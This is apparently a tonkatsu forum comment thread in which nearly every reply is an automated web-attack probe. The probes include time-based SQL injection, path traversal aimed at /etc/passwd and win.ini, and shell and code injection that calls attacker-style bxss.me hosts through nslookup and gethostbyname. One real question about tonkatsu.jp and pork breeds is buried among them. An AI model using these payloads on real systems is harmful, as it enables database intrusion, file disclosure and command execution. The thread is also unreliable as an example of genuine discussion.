HhRyMjw7' OR 414=(SELECT 414 FROM PG_SLEEP(15))--
re: Eric Yu
muzE1tkj') OR 80=(SELECT 80 FROM PG_SLEEP(15))--
re: Eric Yu
p6BEokBO')) OR 961=(SELECT 961 FROM PG_SLEEP(15))--
re: Eric Yu
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Eric Yu
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Eric Yu
'||(select 1 from (select pg_sleep(15))x)||'
re: Eric Yu
''||(select 1 from (select pg_sleep(15))x)||''
re: Eric Yu
1'"
re: Eric Yu
@@3W6kk
re: Eric Yu
Be2z7t5c
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
1*
re: Eric Yu
-1 OR 2+88-88-1=0+0+0+1
re: Eric Yu
-1 OR 3+88-88-1=0+0+0+1
re: Eric Yu
if(now()=sysdate(),sleep(15),0)
re: Eric Yu
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Eric Yu
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Eric Yu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Eric Yu
-1; waitfor delay '0:0:15' --
re: Eric Yu
-1); waitfor delay '0:0:15' --
re: Eric Yu
1 waitfor delay '0:0:15' --
re: Eric Yu
lbwopFYU'; waitfor delay '0:0:15' --
re: Eric Yu
-5 OR 903=(SELECT 903 FROM PG_SLEEP(15))--
re: Eric Yu
-5) OR 284=(SELECT 284 FROM PG_SLEEP(15))--
re: Eric Yu
-1)) OR 665=(SELECT 665 FROM PG_SLEEP(15))--
re: Eric Yu
7CCq3a4d' OR 59=(SELECT 59 FROM PG_SLEEP(15))--
re: Eric Yu
l5asNNN9') OR 44=(SELECT 44 FROM PG_SLEEP(15))--
re: Eric Yu
rTKkJNne')) OR 153=(SELECT 153 FROM PG_SLEEP(15))--
re: Eric Yu
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Eric Yu
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Eric Yu
'||(select 1 from (select pg_sleep(15))x)||'
re: Eric Yu
''||(select 1 from (select pg_sleep(15))x)||''
re: Eric Yu
1'"
re: Eric Yu
@@0vOOi
re: Eric Yu
1FhZc3EgO
re: Eric Yu
response.write(9694888*9516959)
re: Eric Yu
%0abcc:074625.67-10087.67.f1495.19990.2@bxss.me
re: Eric Yu
'+response.write(9694888*9516959)+'
re: Eric Yu
to@example.com>%0d%0abcc:074625.67-10088.67.f1495.19990.2@bxss.me
re: Eric Yu
"+response.write(9694888*9516959)+"
re: Eric Yu
<esi:include src="http://bxss.me/rpb.png"/>
re: Eric Yu
${10000312+10000022}
re: Eric Yu
../../../../../../../../../../../../../../etc/passwd
re: Eric Yu
../../../../../../../../../../../../../../windows/win.ini
re: Eric Yu
file:///etc/passwd
re: Eric Yu
../../../../../../../../../../../../../../../proc/version
re: Eric Yu
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Eric Yu
../../../../../../../../../../etc/passwd%00.jpg
re: Eric Yu
'.gethostbyname(lc('hittz'.'rdtqzqlmffc55.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(88).chr(111).chr(71).'
re: Eric Yu
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Eric Yu
)
re: Eric Yu
".gethostbyname(lc("hitmk"."gjekapfbf90c3.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(79).chr(116).chr(89)."
re: Eric Yu
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Eric Yu
!(()&&!|*|*|
re: Eric Yu
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Eric Yu
^(#$!@#$)(()))******
re: Eric Yu
echo mqqqws$()\ shkngf\nz^xyu||a #' &echo mqqqws$()\ shkngf\nz^xyu||a #|" &echo mqqqws$()\ shkngf\nz^xyu||a #
re: Eric Yu
/etc/passwd
re: Eric Yu
&echo qocsst$()\ hpbcdn\nz^xyu||a #' &echo qocsst$()\ hpbcdn\nz^xyu||a #|" &echo qocsst$()\ hpbcdn\nz^xyu||a #
re: Eric Yu
%2fetc%2fpasswd
re: Eric Yu
|echo xtmhpl$()\ xdiwci\nz^xyu||a #' |echo xtmhpl$()\ xdiwci\nz^xyu||a #|" |echo xtmhpl$()\ xdiwci\nz^xyu||a #
re: Eric Yu
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Eric Yu
(nslookup hitpseilvmifc74c81.bxss.me||perl -e "gethostbyname('hitpseilvmifc74c81.bxss.me')")
re: Eric Yu
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Eric Yu
$(nslookup hitidtzehxpxkb4e15.bxss.me||perl -e "gethostbyname('hitidtzehxpxkb4e15.bxss.me')")
re: Eric Yu
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Eric Yu
&nslookup hitomkcpednqx33e6b.bxss.me&'\"`0&nslookup hitomkcpednqx33e6b.bxss.me&`'
re: Eric Yu
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Eric Yu
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Eric Yu
HttP://bxss.me/t/xss.html?%00
re: Eric Yu
&(nslookup hityylqzkqfjgdb7d1.bxss.me||perl -e "gethostbyname('hityylqzkqfjgdb7d1.bxss.me')")&'\"`0&(nslookup hityylqzkqfjgdb7d1.bxss.me||perl -e "gethostbyname('hityylqzkqfjgdb7d1.bxss.me')")&`'
re: Eric Yu
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Eric Yu
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Eric Yu
"+"A".concat(70-3).concat(22*4).concat(99).concat(85).concat(107).concat(86)+(require"socket"
Socket.gethostbyname("hitgx"+"dntugdnebe41c.bxss.me.")[3].to_s)+"
re: Eric Yu
bxss.me/t/xss.html?%00
re: Eric Yu
|(nslookup hitztxdcyxbld3c71f.bxss.me||perl -e "gethostbyname('hitztxdcyxbld3c71f.bxss.me')")
re: Eric Yu
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Eric Yu
Http://bxss.me/t/fit.txt
re: Eric Yu
'+'A'.concat(70-3).concat(22*4).concat(121).concat(73).concat(101).concat(80)+(require'socket'
Socket.gethostbyname('hitig'+'cnuhnwgy6a8a1.bxss.me.')[3].to_s)+'
re: Eric Yu
`(nslookup hitjkyulzyjyd106f2.bxss.me||perl -e "gethostbyname('hitjkyulzyjyd106f2.bxss.me')")`
re: Eric Yu
file:///etc/passwd
re: Eric Yu
http://bxss.me/t/fit.txt%3F.jpg
re: Eric Yu
;(nslookup hitoypkpqbsub862e3.bxss.me||perl -e "gethostbyname('hitoypkpqbsub862e3.bxss.me')")|(nslookup hitoypkpqbsub862e3.bxss.me||perl -e "gethostbyname('hitoypkpqbsub862e3.bxss.me')")&(nslookup hitoypkpqbsub862e3.bxss.me||perl -e "gethostbyname('hitoypkpqbsub862e3.bxss.me')")
re: Eric Yu
/\../\../\../\../\../\../\../etc/passwd
re: Eric Yu
/etc/shells
re: Eric Yu
/WEB-INF/web.xml
re: Eric Yu
c:/windows/win.ini
re: Eric Yu
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Eric Yu
C:\WINDOWS\system32\drivers\etc\hosts
re: Eric Yu
bxss.me
re: Eric Yu
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Eric Yu
../../../../../../../../../../windows/win.ini%00.jpg
re: Eric Yu
';print(md5(31337));$a='
re: Eric Yu
/../../../../../../../../../../boot.ini
re: Eric Yu
";print(md5(31337));$a="
re: Eric Yu
'"
re: Eric Yu
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Eric Yu
${@print(md5(31337))}
re: Eric Yu
<!--
re: Eric Yu
..\..\..\..\..\..\..\..\windows\win.ini
re: Eric Yu
${@print(md5(31337))}\
re: Eric Yu
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Eric Yu
'.print(md5(31337)).'
re: Eric Yu
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Eric Yu
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Eric Yu
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Eric Yu
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Eric Yu
WEB-INF/web.xml
re: Eric Yu
WEB-INF\web.xml
re: Eric Yu
1
re: Eric Yu
1
re: Eric Yu
-1 OR 2+938-938-1=0+0+0+1 --
re: Eric Yu
-1 OR 3+938-938-1=0+0+0+1 --
re: Eric Yu
-1 OR 2+675-675-1=0+0+0+1
re: Eric Yu
-1 OR 3+675-675-1=0+0+0+1
re: Eric Yu
-1' OR 2+27-27-1=0+0+0+1 --
re: Eric Yu
-1' OR 3+27-27-1=0+0+0+1 --
re: Eric Yu
-1' OR 2+283-283-1=0+0+0+1 or 'oHI71Mft'='
re: Eric Yu
-1' OR 3+283-283-1=0+0+0+1 or 'oHI71Mft'='
re: Eric Yu
-1" OR 2+866-866-1=0+0+0+1 --
re: Eric Yu
-1" OR 3+866-866-1=0+0+0+1 --
re: Eric Yu
if(now()=sysdate(),sleep(15),0)
re: Eric Yu
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Eric Yu
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Eric Yu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Eric Yu
-1; waitfor delay '0:0:15' --
re: Eric Yu
-1); waitfor delay '0:0:15' --
re: Eric Yu
1 waitfor delay '0:0:15' --
re: Eric Yu
Z7OWLNuQ'; waitfor delay '0:0:15' --
re: Eric Yu
-5 OR 635=(SELECT 635 FROM PG_SLEEP(15))--
re: Eric Yu
-5) OR 74=(SELECT 74 FROM PG_SLEEP(15))--
re: Eric Yu
-1)) OR 322=(SELECT 322 FROM PG_SLEEP(15))--
re: Eric Yu
M8PxNFCS' OR 971=(SELECT 971 FROM PG_SLEEP(15))--
re: Eric Yu
3cyAxqjF') OR 387=(SELECT 387 FROM PG_SLEEP(15))--
re: Eric Yu
qMOJfhiA')) OR 265=(SELECT 265 FROM PG_SLEEP(15))--
re: Eric Yu
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Eric Yu
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Eric Yu
'||(select 1 from (select pg_sleep(15))x)||'
re: Eric Yu
''||(select 1 from (select pg_sleep(15))x)||''
re: Eric Yu
1'"
re: Eric Yu
@@fdiuE
Any more information on tonkatsu.jp?
Also what breed is your favorite? I usually go for TokyoX if available but want to try others too
re: hambogo
irc3hGIs
re: hambogo
1*
re: hambogo
1*
re: hambogo
1*
re: hambogo
1*
re: hambogo
-1 OR 2+825-825-1=0+0+0+1
re: hambogo
-1 OR 3+825-825-1=0+0+0+1
re: hambogo
if(now()=sysdate(),sleep(15),0)
re: hambogo
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: hambogo
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: hambogo
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: hambogo
-1; waitfor delay '0:0:15' --
re: hambogo
-1); waitfor delay '0:0:15' --
re: hambogo
1 waitfor delay '0:0:15' --
re: hambogo
GgM6N75L'; waitfor delay '0:0:15' --
re: hambogo
-5 OR 485=(SELECT 485 FROM PG_SLEEP(15))--
re: hambogo
-5) OR 252=(SELECT 252 FROM PG_SLEEP(15))--
re: hambogo
-1)) OR 390=(SELECT 390 FROM PG_SLEEP(15))--
re: hambogo
FNezUCIK' OR 138=(SELECT 138 FROM PG_SLEEP(15))--
re: hambogo
gwbOejEJ') OR 553=(SELECT 553 FROM PG_SLEEP(15))--
re: hambogo
CuVvnYw5')) OR 769=(SELECT 769 FROM PG_SLEEP(15))--
re: hambogo
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: hambogo
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: hambogo
'||(select 1 from (select pg_sleep(15))x)||'
re: hambogo
''||(select 1 from (select pg_sleep(15))x)||''
re: hambogo
1'"
re: hambogo
@@j6F4O
re: hambogo
zfODsX0J
re: hambogo
1*
re: hambogo
1*
re: hambogo
1*
re: hambogo
1*
re: hambogo
-1 OR 2+741-741-1=0+0+0+1
re: hambogo
-1 OR 3+741-741-1=0+0+0+1
re: hambogo
if(now()=sysdate(),sleep(15),0)
re: hambogo
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: hambogo
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: hambogo
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: hambogo
-1; waitfor delay '0:0:15' --
re: hambogo
-1); waitfor delay '0:0:15' --
re: hambogo
1 waitfor delay '0:0:15' --
re: hambogo
kcGITl3X'; waitfor delay '0:0:15' --
re: hambogo
-5 OR 56=(SELECT 56 FROM PG_SLEEP(15))--
re: hambogo
-5) OR 371=(SELECT 371 FROM PG_SLEEP(15))--
re: hambogo
-1)) OR 112=(SELECT 112 FROM PG_SLEEP(15))--
re: hambogo
wd42WMwx' OR 944=(SELECT 944 FROM PG_SLEEP(15))--
re: hambogo
DDtjCSPz') OR 376=(SELECT 376 FROM PG_SLEEP(15))--
re: hambogo
JYOIPpTn')) OR 806=(SELECT 806 FROM PG_SLEEP(15))--
re: hambogo
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: hambogo
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: hambogo
'||(select 1 from (select pg_sleep(15))x)||'
re: hambogo
''||(select 1 from (select pg_sleep(15))x)||''
re: hambogo
1'"
re: hambogo
@@kXeej
re: hambogo
1YQdr5HCO
re: hambogo
%0abcc:074625.67-10076.67.78611.19990.2@bxss.me
re: hambogo
response.write(9621306*9841914)
re: hambogo
<esi:include src="http://bxss.me/rpb.png"/>
re: hambogo
to@example.com>%0d%0abcc:074625.67-10077.67.78611.19990.2@bxss.me
re: hambogo
'+response.write(9621306*9841914)+'
re: hambogo
"+response.write(9621306*9841914)+"
re: hambogo
${10000347+9999432}
re: hambogo
../../../../../../../../../../../../../../etc/passwd
re: hambogo
../../../../../../../../../../../../../../windows/win.ini
re: hambogo
file:///etc/passwd
re: hambogo
../../../../../../../../../../../../../../../proc/version
re: hambogo
'.gethostbyname(lc('hityo'.'lcswufnb5eac1.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(69).chr(118).chr(80).'
re: hambogo
)
re: hambogo
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: hambogo
".gethostbyname(lc("hitmf"."tkhvxrctbec57.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(82).chr(99).chr(86)."
re: hambogo
!(()&&!|*|*|
re: hambogo
../../../../../../../../../../etc/passwd%00.jpg
re: hambogo
^(#$!@#$)(()))******
re: hambogo
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: hambogo
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: hambogo
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: hambogo
/etc/passwd
re: hambogo
echo blkdtl$()\ gomlul\nz^xyu||a #' &echo blkdtl$()\ gomlul\nz^xyu||a #|" &echo blkdtl$()\ gomlul\nz^xyu||a #
re: hambogo
HttP://bxss.me/t/xss.html?%00
re: hambogo
%2fetc%2fpasswd
re: hambogo
&echo ijaafj$()\ akzqeg\nz^xyu||a #' &echo ijaafj$()\ akzqeg\nz^xyu||a #|" &echo ijaafj$()\ akzqeg\nz^xyu||a #
re: hambogo
"+"A".concat(70-3).concat(22*4).concat(108).concat(68).concat(122).concat(73)+(require"socket"
Socket.gethostbyname("hitxf"+"zifpeffw69c98.bxss.me.")[3].to_s)+"
re: hambogo
bxss.me/t/xss.html?%00
re: hambogo
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: hambogo
/.././.././.././.././.././.././.././../etc/./passwd%00
re: hambogo
|echo hbxejx$()\ iulkly\nz^xyu||a #' |echo hbxejx$()\ iulkly\nz^xyu||a #|" |echo hbxejx$()\ iulkly\nz^xyu||a #
re: hambogo
'+'A'.concat(70-3).concat(22*4).concat(109).concat(70).concat(111).concat(80)+(require'socket'
Socket.gethostbyname('hithv'+'lhfehcqd56dc2.bxss.me.')[3].to_s)+'
re: hambogo
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: hambogo
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: hambogo
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: hambogo
(nslookup hityqpddirumub5655.bxss.me||perl -e "gethostbyname('hityqpddirumub5655.bxss.me')")
re: hambogo
Http://bxss.me/t/fit.txt
re: hambogo
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: hambogo
$(nslookup hitkimedugcuk6e77a.bxss.me||perl -e "gethostbyname('hitkimedugcuk6e77a.bxss.me')")
re: hambogo
'"
re: hambogo
http://bxss.me/t/fit.txt%3F.jpg
re: hambogo
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: hambogo
&nslookup hitzuwfnjjnwob7677.bxss.me&'\"`0&nslookup hitzuwfnjjnwob7677.bxss.me&`'
re: hambogo
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: hambogo
<!--
re: hambogo
/etc/shells
re: hambogo
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: hambogo
&(nslookup hitsvrppkkkru4d9cb.bxss.me||perl -e "gethostbyname('hitsvrppkkkru4d9cb.bxss.me')")&'\"`0&(nslookup hitsvrppkkkru4d9cb.bxss.me||perl -e "gethostbyname('hitsvrppkkkru4d9cb.bxss.me')")&`'
re: hambogo
';print(md5(31337));$a='
re: hambogo
c:/windows/win.ini
re: hambogo
invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.